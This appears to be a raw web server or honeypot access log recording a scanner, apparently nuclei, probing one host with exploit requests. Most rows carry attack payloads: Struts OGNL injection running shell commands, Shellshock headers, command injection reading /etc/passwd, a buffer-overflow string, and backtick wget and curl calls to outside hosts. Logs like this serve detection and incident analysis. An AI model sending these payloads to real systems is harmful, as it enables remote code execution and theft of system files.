| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
| 20220127-19:09:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
| 20220127-19:09:24 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
| 20220127-18:31:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27 |
| 20220127-18:32:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /owa/auth/x.js |
| 20220127-18:32:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /user.action |
| 20220127-18:32:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 |
| 20220127-18:32:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /tests/support/stores/test_grid_filter.php?query=phpinfo(); |
| 20220127-18:32:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | https://54.89.6.87/diag_ping_admin_en.asp |
| 20220127-18:32:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | https://54.89.6.87/index.htmlr |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /actuator/env |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | https://54.89.6.87/login.shtml |
| 20220127-18:32:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /mailingupgrade.php |
| 20220127-18:32:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /context.json |
| 20220127-18:32:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /cgi-bin/mt/mt-xmlrpc.cgi |
| 20220127-18:32:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 20220127-18:32:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /wls-wsat/CoordinatorPortType |
| 20220127-18:32:17 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /EemAdminService/EemAdmin |
| 20220127-18:32:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /cgi-bin/system_mgr.cgi? |
| 20220127-18:32:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget |
| 20220127-18:33:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | https://54.89.6.87/webadmin/admin/service_manager_data.php |
| 20220127-18:33:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | https://54.89.6.87/webadmin/admin/service_manager_data.php |
| 20220127-18:33:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 |
| 20220127-18:33:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /nuclei.txt |
| 20220127-18:33:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /servlet/UploadServlet |
| 20220127-18:33:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /lcms/index.php |
| 20220127-18:35:49 | 45.15.19.130 | 45.15.19.130 | () { :; }; echo ; echo ; /bin/cat /etc/passwd | /cgi-bin/slogin/login.py |
| 20220127-18:36:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /webmail/basic/ |
| 20220127-18:36:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:36:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING |
| 20220127-18:36:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /ucmdb-api/connect |
| 20220127-18:36:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /secure/ContactAdministrators!default.jspa |
| 20220127-18:36:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json |
| 20220127-18:36:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 |
| 20220127-18:37:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /storfs-asup |
| 20220127-18:37:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /include/makecvs.php?Event=%60wget%20http%3A%2F%2F%60 |
| 20220127-18:38:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F%60 |
| 20220127-18:38:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /website/blog/ |
| 20220127-18:38:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /_search |
| 20220127-18:38:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /invoker/JMXInvokerServlet/ |
| 20220127-18:38:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /invoker/EJBInvokerServlet/ |
| 20220127-18:38:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /guest_auth/guestIsUp.php |
| 20220127-18:38:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /guest_auth/poc.php?cmd=cat%20/etc/passwd |
| 20220127-18:39:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /integration/saveGangster.action |
| 20220127-18:39:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /pages/systemcall.php?command=cat%20/etc/passwd |
| 20220127-18:39:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /wsman |
| 20220127-18:39:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /cgi/networkDiag.cgi |
| 20220127-18:40:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 |
| 20220127-18:40:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /wp-admin/admin-ajax.php |
| 20220127-18:40:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /login.htm |
| 20220127-18:40:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:40:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /wp-content/uploads/workreap-temp/24IBLYnyDILr28C9xkIyqB7QIs7.php |
| 20220127-18:40:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; |
| 20220127-18:40:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /service/extdirect |
| 20220127-18:40:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 |
| 20220127-18:40:57 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; |
| 20220127-18:41:18 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /wp-content/plugins/simple-file-list/ee-upload-engine.php |
| 20220127-18:41:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /wp-content/plugins/simple-file-list/ee-file-engine.php |
| 20220127-18:41:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /wp-content/uploads/simple-file-list/nuclei.php |
| 20220127-18:41:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 |
| 20220127-18:41:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users |
| 20220127-18:43:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php |
| 20220127-18:43:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /v2/query |
| 20220127-18:43:43 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /./RestAPI/LogonCustomization |
| 20220127-18:43:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /./RestAPI/LogonCustomization |
| 20220127-18:43:48 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /./RestAPI/Connection |
| 20220127-18:43:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /help/admin-guide/test.jsp |
| 20220127-18:43:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /run |
| 20220127-18:44:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /php/ping.php |
| 20220127-18:45:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /cgi-bin/login.cgi |
| 20220127-18:45:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /script/ |
| 20220127-18:46:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| 20220127-18:46:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| 20220127-18:46:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /ajax/networking/get_netcfg.php?iface=;curl%20http:///`whoami`; |
| 20220127-18:46:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /auth/change |
